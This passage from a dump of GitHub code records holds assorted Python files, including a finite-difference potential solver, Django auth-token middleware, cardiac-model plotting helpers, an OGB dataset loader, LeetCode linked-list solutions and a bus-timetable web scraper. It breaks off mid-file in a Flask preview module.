n)\n","repo_name":"YutingYao/YutingDB","sub_path":"PyLeetcode之断断续续在刷题/001twoSum.py","file_name":"001twoSum.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
{"seq_id":"28032409611","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 26 22:31:00 2021\r\n\r\n@author: thesa\r\n\"\"\"\r\n## IMPORTS ##\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n# FUNCTIONS #\r\n#Contour plot\r\ndef plot_contour(Phi, filename=None, zlabel=r\"potential $\\\Phi$ (V)\",\r\n                 cmap=plt.cm.coolwarm):\r\n    \"\"\"Plot Phi as a contour plot.\r\n    \r\n    Arguments\r\n    ---------\r\n    Phi : 2D array\r\n        potential on lattice\r\n    filename : string or None, optional (default: None)\r\n        If `None` then show the figure and return the axes object.\r\n        If a string is given (like \"contour.png\") it will only plot \r\n        to the filename and close the figure but return the filename.\r\n    cmap : colormap\r\n        pick one from matplotlib.cm \r\n    \"\"\"\r\n    fig = plt.figure(figsize=(5,4))\r\n    ax = fig.add_subplot(111)\r\n\r\n    x = np.arange(Phi.shape[0])\r\n    y = np.arange(Phi.shape[1])\r\n    X, Y = np.meshgrid(x, y)\r\n    Z = Phi[X, Y]\r\n    cset = ax.contourf(X, Y, Z, 20, cmap=cmap)\r\n    ax.set_xlabel('X')\r\n    ax.set_ylabel('Y')\r\n    ax.set_aspect(1)\r\n\r\n    cb = fig.colorbar(cset, shrink=0.5, aspect=5)\r\n    cb.set_label(zlabel)\r\n    \r\n    if filename:\r\n        fig.savefig(filename)\r\n        plt.close(fig)\r\n        return filename\r\n    else:\r\n        return ax\r\n\r\n\r\n\r\n## INITIALIZING ARRAYS AND CONSTANTS ##\r\ngamma = 1.0 #float(input(\"Value for Gamma: \"))\r\n\r\ngammaSize = int(gamma *100+ 1)\r\n\r\n#Used for array sizes\r\nNmax = 100\r\nMmax = 100\r\n#Max_iter = 70\r\n\r\n#Indexes (These will constantly reset)\r\ni = 0\r\nj = 0\r\nk = 0\r\n\r\n# ARRAYS #\r\n#R-Diff tridiag matrix A_nn\r\nA_nn = np.zeros((Nmax, Nmax), dtype=np.float64)\r\n\r\n# WRITE DIAGONALS #\r\n#A_nn\r\n\r\nwhile i < Nmax: #Primary\r\n    dr = 1/(i+1)\r\n    A_nn[i,i] = -(2+1/(i+1)**2)/dr**2\r\n    i += 
1\r\ni = 0\r\n\r\n\r\nwhile i < Nmax-1: #Sub\r\n dr = 1/(i+1)\r\n A_nn[i+1,i] = (1-1/(2*(i+1)))/(dr**2)\r\n i += 1 \r\ni = 0\r\n\r\n#Super\r\nwhile i < Nmax-1:\r\n dr = 1/(i+1)\r\n A_nn[i,i+1] = (1+1/(2*(i+1)))/(dr**2)\r\n i += 1 \r\ni=0\r\nprint(\"#################HERE IS A_nn\\n\",A_nn,\"\\n#################\\n\") \r\n\r\n\r\n#Diagonal transform\r\nZ_nn, Z_nn = np.linalg.eig(A_nn) #Makes matrix for Z_nn\r\ninverseZ_nn = np.linalg.inv(Z_nn) #Z^(-1)\r\nE_nn= inverseZ_nn.dot(A_nn).dot(Z_nn) #Z^(-1).A.Z\r\neig = np.linalg.eig(A_nn)\r\ne_i = eig[0]\r\n\r\n\r\n#Z-Diff tridiag matrix B_mm\r\nB_mm = np.zeros((Mmax, Mmax), dtype=np.float64)\r\nwhile j < Mmax:\r\n dz = gamma / (j+1)\r\n B_mm[j,j] = -2/dz**2\r\n j += 1\r\nj = 0\r\nwhile j < Mmax-1:\r\n dz = gamma / (j+1)\r\n B_mm[j+1,j] = 1/dz**2\r\n j += 1\r\nj = 0\r\nwhile j < Mmax-1:\r\n dz = gamma / (j+1)\r\n B_mm[j,j+1] = 1/dz**2\r\n j += 1\r\n\r\nprint(\"#################HERE IS B_mm\\n\",B_mm,\"\\n#################\\n\") \r\n\r\n#RHS ARRAY F_nm\r\nF_nm = np.zeros((Nmax, Mmax), dtype=np.float64)\r\n \r\nwhile k <= Nmax -1:\r\n #F_nm[-1,k] = F_nm[-1,k] + 1/(Nmax-1)*k\r\n dz = gamma / (1)\r\n dr = 1/(k+1)\r\n \r\n F_nm [k,0] = F_nm [k,0] - dr*(1+k)/dz**2\r\n \r\n k+=1\r\nk = 0\r\n\r\n#H_mn array\r\nH_mn = np.transpose(F_nm).dot(np.transpose(inverseZ_nn))\r\n\r\n#Identiy of size m x m\r\nI_mm = np.identity(Mmax)\r\n\r\n#U_nm array\r\nU_nm = np.zeros((Nmax, Mmax), dtype=np.float64)\r\ni=0\r\nwhile i < Mmax-1:\r\n U_nm[i,:] = np.linalg.inv(B_mm + e_i[i]*I_mm).dot(H_mn[:,i])\r\n i += 1\r\n\r\n\r\n# BOUNDARY CONDITIONS #\r\n\r\n#0 conditions\r\n#v = np.zeros((Nmax, Mmax), dtype=np.float64)\r\n#v[0, :] = 0 #(0,0) -> (0,gamma) =0 /\\ (0,gamma) -> (1,gamma) = 0 /\\ (1,0) -> (1,gamma) =0 \r\nk = 0\r\n\r\n#NH Conditions\r\n#Loop sets the (0,0) -> (1,0) boundary condition\r\n#while k <= Mmax -1:\r\n# v[-1,k] = v[-1,k] + 1/(Nmax)*k\r\n\r\n # k+=1\r\n#k = 0 #reset indexing in case I need it\r\n#print(v)\r\nprint(F_nm)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#U_nm = rows of the solution (B_mm +eigenvalues I_mm)\r\n\r\n\r\n\r\n#v = Z_nn * U_nm\r\nv = Z_nn.dot(U_nm)\r\n\r\nprint(v)\r\n\r\n\r\n\r\nplot_contour(v)","repo_name":"Thesaxman1126/Online_Backup_of_my_PY_Files","sub_path":"462testing.py","file_name":"462testing.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10682557982","text":"\"\"\"\nDjango middlewares for the Azimuth auth package.\n\"\"\"\n\nfrom datetime import datetime, timedelta\nimport logging\n\nfrom dateutil import parser, tz\n\nfrom .settings import auth_settings\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseMiddleware:\n \"\"\"\n Base class for other Azimuth auth middlewares.\n\n Each middleware implements a particular method by which a token may be provided,\n e.g. bearer tokens or session data.\n \"\"\"\n def __init__(self, get_response):\n self.get_response = get_response\n\n def get_token(self, request):\n \"\"\"\n Get the current token from the request. 
May return null if no token is present.\n \"\"\"\n raise NotImplementedError\n\n def __call__(self, request):\n token = self.get_token(request)\n if token:\n request.META[auth_settings.DOWNSTREAM_TOKEN_HEADER] = token\n return self.get_response(request)\n\n\nclass BearerTokenMiddleware(BaseMiddleware):\n \"\"\"\n Middleware that reads token information from a bearer token.\n \"\"\"\n def get_token(self, request):\n header = request.META.get(auth_settings.BEARER_TOKEN_HEADER, \"\").strip()\n # If no prefix is configured, use an empty string\n # This means that startswith always returns true and removeprefix does nothing\n prefix = auth_settings.BEARER_TOKEN_PREFIX or \"\"\n if header and header.startswith(prefix):\n return header.removeprefix(prefix).strip()\n\n\nclass SessionTokenMiddleware(BaseMiddleware):\n \"\"\"\n Middleware that reads token information from the session.\n \"\"\"\n def get_token(self, request):\n token = request.session.get(auth_settings.TOKEN_SESSION_KEY, None)\n if token:\n token, expires = token\n # If expires is present, it should be an ISO-formatted string\n # If it is not present, the token is assumed to have no expiry\n if expires:\n now = datetime.now(tz.UTC)\n expires = parser.isoparse(expires)\n delta = timedelta(seconds = auth_settings.TOKEN_REFRESH_INTERVAL)\n # Try to refresh the token if it is within the delta of expiring but not already expired\n if now < expires < now + delta:\n logger.info('Attempting to refresh expiring token')\n try:\n token, expires = auth_settings.AUTHENTICATOR.refresh_token(token)\n except NotImplementedError:\n # If token refresh is not implemented, just ignore it\n logger.info('Authenticator does not support token refresh')\n except Exception:\n # Any other exception should be logged, but we still allow the\n # request to proceed\n logger.exception('Error occurred during token refresh')\n else:\n logger.info('Token refreshed successfully')\n # Store the refreshed token in the session\n request.session[auth_settings.TOKEN_SESSION_KEY] = token, expires\n elif now >= expires:\n logger.info('Token has already expired')\n else:\n logger.info('Token refresh not required yet')\n return token\n else:\n return None\n","repo_name":"cedadev/jasmin-azimuth","sub_path":"azimuth_auth/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11537781528","text":"import numpy as np\n# Don't import pyplot yet, this will cause a crash if no window environment\n# is loaded.\ndef simulation_times(time=None, realtime=None, evaluations=None, mode='stair',\n axes=None, nbuckets=50, label=None):\n \"\"\"\n Draws a graph of step sizes used during a simulation.\n\n Data can be passed in as ``time`` (simulation time) ``realtime``\n (benchmarked time during the simulation) and ``evaluations`` (the number\n of evaluations needed for each step). 
Which of these fields are required\n    depends on the chosen plot ``mode``:\n\n    ``stair``\n        Draws ``time`` on the x-axis, and the step number on the y-axis.\n        In this plot, a high slope means the integrator is taking lots of\n        steps.\n    ``stair_inverse``\n        Draws ``time`` on the y-axis, and the step number on the x-axis.\n    ``load``\n        Draws ``time`` on the x-axis, and log(1 / step size) on the y-axis.\n        In this plot, high values on the y-axis should be found near difficult\n        times on the x-axis\n    ``histo``\n        Lumps ``time`` into buckets (whose number can be specified using the\n        argument ``nbuckets``) and counts the number of steps in each bucket.\n        In the final result, the times corresponding to the buckets are plotted\n        on the x axis and the number of evaluations in each bucket is plotted\n        on the y axis.\n    ``time_per_step``\n        Uses the ``realtime`` argument to calculate the time taken to advance\n        the solution each step.\n        In the resulting plot, the step count is plotted on the x-axis, while\n        the y-axis shows the time spent at this point.\n    ``eval_per_step``\n        Uses the ``evaluations`` entry to calculate the number of rhs\n        evaluations required for each step.\n        In the resulting plot, the step number is plotted on the x-axis, and\n        the number of rhs evaluations for each step is plotted on the y-axis.\n\n    The argument ``axes`` can be used to pass in a matplotlib axes object to be\n    used for the plot. If none are given, the current axes obtained from\n    ``pyplot.gca()`` are used.\n\n    Returns a matplotlib axes object.\n    \"\"\"\n    import matplotlib.pyplot as pl\n    if axes is None:\n        axes = pl.gca()\n    def stair(ax, time, realtime, evaluations):\n        if time is None:\n            raise ValueError('This plotting mode requires \"time\" to be set.')\n        time = np.array(time, copy=False)\n        step = np.arange(0, len(time))\n        ax.step(time, step, label=label)\n    def stair_inverse(ax, time, realtime, evaluations):\n        if time is None:\n            raise ValueError('This plotting mode requires \"time\" to be set.')\n        time = np.array(time, copy=False)\n        step = np.arange(0, len(time))\n        ax.step(step, time, label=label)\n    def load(ax, time, realtime, evaluations):\n        if time is None:\n            raise ValueError('This plotting mode requires \"time\" to be set.')\n        time = np.array(time, copy=False)\n        size = np.log(1.0 / (time[1:] - time[:-1]))\n        ax.step(time[1:], size, label=label)\n    def histo(ax, time, realtime, evaluations):\n        if time is None:\n            raise ValueError('This plotting mode requires \"time\" to be set.')\n        time = np.array(time, copy=False)\n        zero = float(time[0])\n        bucket_w = (time[-1] - zero) / nbuckets\n        bucket_m = bucket_w * 0.5\n        bucket_x = np.zeros(nbuckets)\n        bucket_y = np.zeros(nbuckets)\n        hi = zero\n        for k in xrange(nbuckets):\n            lo = hi\n            hi = zero + (k + 1) * bucket_w\n            bucket_x[k] = lo\n            bucket_y[k] = np.sum((lo < time)*(time <= hi))\n        bucket_y[0] += 1 # First bucket contains point lo == time\n        ax.step(bucket_x, bucket_y, where='post', label=label)\n    def time_per_step(ax, time, realtime, evaluations):\n        if realtime is None:\n            raise ValueError('This plotting mode requires \"realtime\" to be'\n                ' set.')\n        real = np.array(realtime) # Will be manipulated\n        real = real[1:] - real[:-1]\n        step = np.arange(1, 1+len(real))\n        ax.step(step, real, where='mid', label=label)\n    def eval_per_step(ax, time, realtime, evaluations):\n        if evaluations is None:\n            raise ValueError('This plotting mode requires \"evaluations\" to be'\n                ' set.')\n        evls = np.array(evaluations) # Will be manipulated\n        evls = evls[1:] - evls[:-1]\n        step = np.arange(1, 
1+len(evls))\n        ax.step(step, evls, where='mid', label=label)\n    modes = {\n        'stair' : stair,\n        'stair_inverse' : stair_inverse,\n        'load' : load,\n        'histo' : histo,\n        'time_per_step' : time_per_step,\n        'eval_per_step' : eval_per_step,\n        }\n    try:\n        fn = modes[mode]\n    except KeyError:\n        raise ValueError('Selected mode not found. Available modes are: '\n            + ', '.join(['\"'+x+'\"' for x in modes.iterkeys()]))\n    return fn(axes, time, realtime, evaluations)\ndef current_arrows(log, voltage, currents, axes=None):\n    \"\"\"\n    Draws a graph of voltage versus time with arrows to indicate which currents\n    are active at which stage of the action potential.\n\n    The argument, ``log`` should be a :class:`myokit.DataLog` containing\n    the data needed for the plot. The argument ``voltage`` should be the key in\n    ``log`` that maps to the membrane potential.\n\n    The list ``currents`` should contain all keys of currents to display.\n\n    Returns a matplotlib axes object.\n    \"\"\"\n    import matplotlib.pyplot as pl\n    # Get currents, normalize with respect to total current at each time\n    log = log.npview()\n    traces = [log[x] for x in currents]\n    times = log.time()\n    memv = log[voltage]\n    # Get sum of _absolute_ traces!\n    I_total = np.zeros(len(traces[0]))\n    for I in traces:\n        I_total += abs(I)\n    # Create axes\n    ax = axes if axes is not None else pl.gca()\n    # Plot membrane potential\n    ax.plot(times, memv)\n    ax.set_title(voltage)\n    # Get width of time steps\n    n = len(times)\n    steps = np.concatenate((times[0:1], times, times[-1:]))\n    steps = 0.5 * steps[2:] - 0.5 * steps[0:-2]\n    # Find \"zero\" points, points of interest\n    threshold_abs = 0.1\n    threshold_int = 0\n    for ii, I in enumerate(traces):\n        # Capture parts where abs(I) is greater than the threshold and the\n        # sign doesn't change\n        parts = []\n        indices = None\n        sign = (I[0] >= 0)\n        for k, i in enumerate(I):\n            if abs(i) < threshold_abs or sign != (i >= 0):\n                # Do nothing\n                if indices is not None:\n                    parts.append(indices)\n                    indices = None\n            else:\n                # Store indices\n                if indices is None:\n                    indices = []\n                indices.append(k)\n            sign = (i >= 0)\n        if indices is not None:\n            parts.append(indices)\n        # For each part, calculate\n        #   the weighted midpoint in time\n        #   the total charge transferred\n        #   the average current\n        #   the peak current\n        #   the total charge transferred / the total sum charge transferred in\n        #   that same time. 
This last measure can be used as a secondary\n # threshold\n for part in parts:\n q_total = 0 # Sum of charge transferred\n t_total = 0 # Total time elapsed\n s_total = 0 # Sum of all currents in this time frame\n i_peak = 0 # Max absolute current\n t_mid = 0 # Weighted midpoint in time\n for k in part:\n t_total += steps[k]\n q_total += steps[k] * I[k]\n s_total += steps[k] * I_total[k]\n t_mid += steps[k] * I[k] * times[k]\n i_peak = max(i_peak, abs(I[k]))\n # Test if relative total transferred charge is above threshold\n if abs(q_total / s_total) < threshold_int:\n continue\n # Weighted midpoint in time (weight is height * width)\n t_mid /= q_total\n # Average charge transferred = total current transferred\n i_total = q_total / t_total\n # Average current\n i_mean = i_total / t_total\n # Add sign to peak current\n if sum(I) < 0: i_peak *= -1.0\n #if log is not None:\n # log.append('-- ' + currents[ii] + ' '\n # + '-'*(76-len(currents[ii])))\n # log.append('Transferred charge (abs) :', q_total)\n # log.append('Transferred charge (rel) :', q_total / s_total)\n # log.append('Start :', times[part[0]])\n # log.append('End :', times[part[-1]])\n # log.append('Duration :', t_total)\n # log.append('Midpoint :', t_mid)\n # log.append('Peak current :', i_peak)\n # log.append('Mean current :', i_mean)\n # log.append('Total current :', i_total)\n # Add arrow\n k = np.nonzero(times >= t_mid)[0][0]\n ars = 'rarrow'\n arx = t_mid\n if k + 1 == len(times):\n ary = memv[k]\n arr = 0\n else:\n t1 = times[k]\n t2 = times[k+1]\n ary = (memv[k]*(t2 - t_mid) + memv[k+1]*(t_mid - t1)) / (t2-t1)\n arr = np.arctan2(t1-t2, memv[k+1]-memv[k]) * 180 / np.pi\n if sum(I) > 0: arr += 180\n if abs(arr) > 90:\n arr = 180 + arr\n ars = 'larrow'\n bbox_props = dict(boxstyle=ars+',pad=0.3', fc='w', ec='black',lw=1)\n ax.annotate(currents[ii], xy=(arx, ary), ha='center', va='center',\n rotation=arr, size=14, bbox=bbox_props)\n return ax\ndef cumulative_current(log, currents, axes, labels=None, colors=None,\n integrate=False):\n \"\"\"\n Plots a number of currents, one on top of the other, with the positive and\n negative parts of the current plotted separately.\n \n The advantage of this type of plot is that it shows the relative size of\n each current versus the others, and gives an indication of the total\n positive and negative current in a model.\n \n Accepts the following arguments:\n \n ``log``\n A :class:`myokit.DataLog` containing all the data to plot.\n ``currents``\n A list of keys, where each key corresponds to a current stored in\n ``log``.\n ``axes``\n The matplotlib axes to create the plot on.\n ``labels``\n Can be used to pass in a list containing the label to set for each\n current.\n ``colors``\n Can be used to pass in a list containing the colors to set for each\n current.\n ``integrate``\n Set this to ``True`` to plot total carried charge instead of currents.\n\n The best results are obtained if relatively constant currents are specified\n early. Another rule of thumb is to specify the currents roughly in the\n order they appear during an AP. 
\n \"\"\"\n import matplotlib\n import matplotlib.pyplot as pl\n # Get numpy version of log\n log = log.npview()\n # Get time\n t = log.time()\n # Get currents or charges\n if integrate:\n signals = [log.integrate(c) for c in currents]\n else:\n signals = [log[c] for c in currents]\n # Colors\n n = len(currents)\n if colors:\n while len(colors) < n:\n colors.extend(colors)\n custom = colors[0:n]\n else:\n # Colormap\n cmap = matplotlib.cm.get_cmap(name='spectral')\n colors = [cmap(i) for i in np.linspace(0.9, 0.1, len(currents))]\n # Offsets\n op = on = 0\n # Plot\n for k, c in enumerate(currents):\n # Get color\n color = colors[k]\n # Get label\n if labels:\n label = labels[k]\n else:\n if integrate:\n label = 'Q(' + c[c.find('.')+1:] + ')'\n else:\n label = c[c.find('.')+1:]\n # Split signal\n s = signals[k]\n p = np.maximum(s, 0) + op\n n = np.minimum(s, 0) + on\n # Plot!\n axes.fill_between(t, p, op, facecolor=color)\n axes.fill_between(t, n, on, facecolor=color)\n axes.plot(t, p, color=color, label=label)\n axes.plot(t, p, color='k', lw=1)\n axes.plot(t, n, color='k', lw=1)\n on = n\n op = p\n","repo_name":"CardiacModelling/tailored-ipsc-models","sub_path":"myokit/lib/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":12506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35139551007","text":"from ogb.nodeproppred import PygNodePropPredDataset\nimport torch_geometric.transforms as T\nimport torch\nimport pandas as pd\nimport json\nimport numpy as np\nimport os\nimport time\nfrom core.utils import time_logger\n\nFILE = 'dataset/ogbn_products_orig/ogbn-products.csv'\n\n\n@time_logger\ndef _process():\n if os.path.isfile(FILE):\n return\n\n print(\"Processing raw text...\")\n ts = time.time()\n\n data = []\n files = ['dataset/ogbn_products/Amazon-3M.raw/trn.json',\n 'dataset/ogbn_products/Amazon-3M.raw/tst.json']\n for file in files:\n with open(file) as f:\n for line in f:\n data.append(json.loads(line))\n\n df = pd.DataFrame(data)\n df.set_index('uid', inplace=True)\n\n nodeidx2asin = pd.read_csv(\n 'dataset/ogbn_products/mapping/nodeidx2asin.csv.gz', compression='gzip')\n\n dataset = PygNodePropPredDataset(\n name='ogbn-products', transform=T.ToSparseTensor())\n graph = dataset[0]\n graph.n_id = np.arange(graph.num_nodes)\n graph.n_asin = nodeidx2asin.loc[graph.n_id]['asin'].values\n\n graph_df = df.loc[graph.n_asin]\n graph_df['nid'] = graph.n_id\n graph_df.reset_index(inplace=True)\n\n if not os.path.isdir('dataset/ogbn_products_orig'):\n os.mkdir('dataset/ogbn_products_orig')\n pd.DataFrame.to_csv(graph_df, FILE,\n index=False, columns=['uid', 'nid', 'title', 'content'])\n\n\ndef get_raw_text_products(use_text=False, seed=0):\n dataset = PygNodePropPredDataset(\n name='ogbn-products', transform=T.ToSparseTensor())\n data = dataset[0]\n\n idx_splits = dataset.get_idx_split()\n train_mask = torch.zeros(data.num_nodes).bool()\n val_mask = torch.zeros(data.num_nodes).bool()\n test_mask = torch.zeros(data.num_nodes).bool()\n train_mask[idx_splits['train']] = True\n val_mask[idx_splits['valid']] = True\n test_mask[idx_splits['test']] = True\n data.train_mask = train_mask\n data.val_mask = val_mask\n data.test_mask = test_mask\n data.edge_index = data.adj_t.to_symmetric()\n\n if not use_text:\n return data, None\n\n _process()\n with open(FILE) as f:\n df = pd.read_csv(f)\n df['title'].fillna(\"\", inplace=True)\n df['content'].fillna(\"\", inplace=True)\n text = []\n for ti, ab in zip(df['title'], 
df['content']):\n        t = 'Title: ' + ti.strip() + '\\n' + 'Content: ' + ab.strip()\n        text.append(t)\n\n    return data, text\n","repo_name":"Charon-ops/GraphLLM","sub_path":"reference_code/TAPE-main/core/data_utils/load_products.py","file_name":"load_products.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"11451577790","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n        kumar=ListNode(0)\n        rum=kumar\n\n        car=0\n        while l1 or l2 or car:\n            v1=l1.val if l1 else 0\n            v2=l2.val if l2 else 0\n\n            val=v1+v2+car\n            car=val//10\n            val=val%10\n            rum.next=ListNode(val)\n\n            rum=rum.next\n            l1=l1.next if l1 else None\n            l2=l2.next if l2 else None\n\n        return kumar.next\n","repo_name":"saadfareed/Leetcode","sub_path":"Python/Add Two Numbers.py","file_name":"Add Two Numbers.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"}
{"seq_id":"39018323876","text":"#!/usr/bin/python3.5\n\nimport sys\nimport re\nfrom pprint import pprint\n#from operator import itemgetter\n\nwhile True:\n    try:\n        line = sys.stdin.readline().rstrip()\n\n        print(line)\n\n    except KeyboardInterrupt:\n        break\n\n    if not line:\n        break\n\n\n","repo_name":"radu/advent","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"35308870456","text":"import pandas as pd\r\n\r\nfeatures=['Sepal.Length','Sepal.Width','Petal.Length','Petal.Width']\r\n\r\nvalues=[5.1,3.8,1.6,0.2]\r\n\r\nX_final=pd.DataFrame([values],columns=features)\r\n\r\nimport joblib\r\n\r\nfilename='flower.sav'\r\n\r\nloaded_model = joblib.load(filename)\r\nresult = loaded_model.predict(X_final)\r\nprint(result)\r\n","repo_name":"Aashishbazzz/Machine-Learning-Web-Appliaction","sub_path":"ML_Wb/IRIS-Flower-classification-master/flower.py","file_name":"flower.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"25800955083","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n        \"\"\"Function to add two numbers together in a linked list notation\n\n        Args:\n            l1 (ListNode): Integer number 1 represented as a linked list\n            l2 (ListNode): Integer number 2 represented as a linked list\n\n        Returns:\n            ListNode: the resulting sum returned as a linked list\n        \"\"\"\n        head = ListNode(0)\n        cur = head\n        carry = 0\n        while l1 or l2 or carry:\n            # Set the value, including handling when l1 or l2 is None, where we set it to 0\n            val1 = l1.val if l1 else 0\n            val2 = l2.val if l2 else 0\n            # Find the value of the two nodes, and determine if there's a carry for the next value\n            sum_value = val1 + val2 + carry\n            carry = sum_value // 10\n            sum_value = sum_value % 10\n            # Create node and append to the list\n            node = ListNode(sum_value)\n            # Move to the next node in each list\n            l1 = l1.next if l1 else None\n            l2 = l2.next if l2 else None\n            cur.next = node\n            cur = node\n        return 
head.next\n","repo_name":"kcc3/leetcode-solutions","sub_path":"problems/python/add_two_numbers.py","file_name":"add_two_numbers.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6115545841","text":"import pandas as pd\nimport sqlite3\n\nfrom utilities.getting_soup_from_web import BSoup\n\ndef user_options():\n '''USER INTERFACE SO THAT IT CAN BE CHOSEN WHAT HE/SHE WANTS TO DO'''\n prompt = '\\nChoose one of the following options:'\n prompt += '\\n --> \"1\" OBTAIN A DATABASE WITH TIMETABLE FOR EVERY LINE'\n prompt += '\\n --> \"2\" OBTAIN A DATABASE WITH BUS_STOPS FOR EVERY LINE'\n prompt += '\\n --> \"3\" OBTAIN A DATABASE WITH BOTH TIMETABLES AND '+ \\\n 'BUS_STOPS FOR EVERY LINE\\n \"q\" to quit\\n'\n active = True\n while active:\n user_choice = input(prompt)\n if user_choice == '1':\n timetables(id_web, num_linea)\n elif user_choice == '2':\n bus_stops(id_web, num_linea)\n elif user_choice == '3':\n timetables(id_web, num_linea)\n bus_stops(id_web, num_linea)\n elif user_choice == 'q':\n break\n else:\n print('You must choose either one of the three options, or quit'+ \\\n '\\nType: \"1\" \"2\" \"3\", or \"q\"')\n active = True\n \ndef soup_timetables(id_, name):\n '''RETRIEVES THE SOUP AFTER SCRAPING THE TIMETABLE WEBPAGE'''\n url_timetables = 'http://transportesrober.com:9055/websae/Transportes'\n url_timetables += '/horario.aspx?id={0}&tipo=L&nombre={1}&fecha=17/02/'\n url_timetables += '2017&desde_horario=si'\n url_timetables = url_timetables.format(id_, name)\n return BSoup(url_timetables).find('div', {'id':'PanelHorario'}) \n\ndef obtain_routes(id_, name):\n '''RETRIEVES THE ROUTES FOR A CERTAIN LINE'''\n soup = soup_timetables(id_, name)\n if (bool(soup)): \n routes = soup.find_all('td', {'class':'tablacabecera'})\n return(routes)\n else:\n lines_not_found.append(name)\n print('Line not found:', lines_not_found)\n\ndef timetables(id_web, line_web_names): \n '''RETRIEVES ALL BUS_TIMETABLE FOR EACH BUS_LINE\n AND POPULATE A DB WITH ITS VALUES'''\n conn_timetables = sqlite3.connect('..\\..\\Data\\Web_crawling_T.Rober\\Trober_data.db')\n\n for id_, name in zip(id_web, line_web_names):\n routes = []\n routes = obtain_routes(id_, name)\n soup = soup_timetables(id_, name)\n\n if (routes):\n for i, route in enumerate(routes):\n timetableDF = pd.DataFrame(\n columns = ['bus_line', 'route', 'timetable'])\n table_name = 'timetable_'\n table_name += '{}'.format(name)+'_'+ \\\n '_'.join(route.text.strip().split())\n table_name = table_name.replace('-', '').replace('__', '_')\n table_name = table_name.replace(' ', '')\n table_timetable = soup.find_all('table')[2+i]\n\n rows = table_timetable.find_all('tr')\n tr_times = []\n for row in rows:\n tr_times.extend(row.text.split(':', 1)[1].split(','))\n\n timetableDF = timetableDF.append(\n pd.DataFrame(\n {'bus_line':name, 'route':table_name,\n 'timetable':tr_times},\n columns=['bus_line', 'route', 'timetable']))\n \n timetableDF.to_sql(table_name, conn_timetables, index=False)\n conn_timetables.commit()\n \n conn_timetables.close()\n \ndef bus_stops(id_web, line_web_names):\n '''RETRIEVES ALL BUS_STOPS FOR EACH BUS_LINE\n AND POPULATE A DB WITH ITS VALUES'''\n conn_bus_stops = sqlite3.connect('..\\..\\Data\\Web_crawling_T.Rober\\Trober_data.db')\n\n for id_, name in zip(id_web, line_web_names):\n url_bus_stops = 'http://transportesrober.com:9055/websae/Transportes/'\n url_bus_stops += 'linea.aspx?idlinea='+str(id_)\n soup = 
BSoup(url_bus_stops)\n routes = []\n routes = obtain_routes(id_, name)\n if (bool(soup) and bool(routes)):\n for i, route in enumerate(routes):\n busstopsDF = pd.DataFrame(columns = ['busstop', 'transfer'])\n\n table_name = 'busstop_'\n table_name += '{}'.format(name)+'_'+\\\n '_'.join(route.text.strip().split())\n table_name = table_name.replace(\n '-','').replace('__','_').replace(' ', '') \n route = soup.find_all('tr', {'class':'tabla_campo_valor'})\n\n for bus_stop in route:\n bus_stops = bus_stop.find_all('tr')\n bus_stop = bus_stops[0].find('a', {'class':'texto'}).text\n transfers = []\n\n for transfer in bus_stops[2].find_all(\n 'a', {'class':'texto'}): \n transfers.append(transfer.text)\n \n transfers = ' '.join(transfers)\n\n busstopsDF = busstopsDF.append(\n pd.DataFrame(data = [[bus_stop, transfers]],\n columns=['busstop', 'transfer']))\n busstopsDF.to_sql(table_name, conn_bus_stops, index=False)\n conn_bus_stops.commit()\n else: \n lines_not_found.append(name)\n\n conn_bus_stops.close()\n\nweb_codesDF = pd.read_csv('..\\..\\Data\\Web_crawling_T.Rober\\lista_lineas_horarios.csv',\n index_col = 'Unnamed: 0')\nweb_codesDF = web_codesDF.reset_index(drop=True)\nid_web = web_codesDF.id_web.values\nnum_linea = web_codesDF.num_linea.values\n\nlines_not_found = [] \nuser_options()\n","repo_name":"VictorGeaGarcia/TRober","sub_path":"Scripts/CRAWLING/4.Crawl_Bustimetables_and_stops_to_db.py","file_name":"4.Crawl_Bustimetables_and_stops_to_db.py","file_ext":"py","file_size_in_byte":5642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3180425147","text":"from __future__ import unicode_literals\n\nimport csv\nimport os\nimport re\nimport requests\nfrom io import BytesIO, open\nfrom math import ceil\nfrom PIL import Image\n\nfrom flask import Flask, request, Response\n\n# Currently, everything is fairly intertwined with the web app\n# (using `app` here and there, for example), but if needed\n# the preview facilities could be split out into their own module\n# with a little bit of finaglin'.\n\nBACKGROUND_COLOR = (249, 214, 83, 255)\nFOREGROUND_COLOR = ( 55, 55, 55, 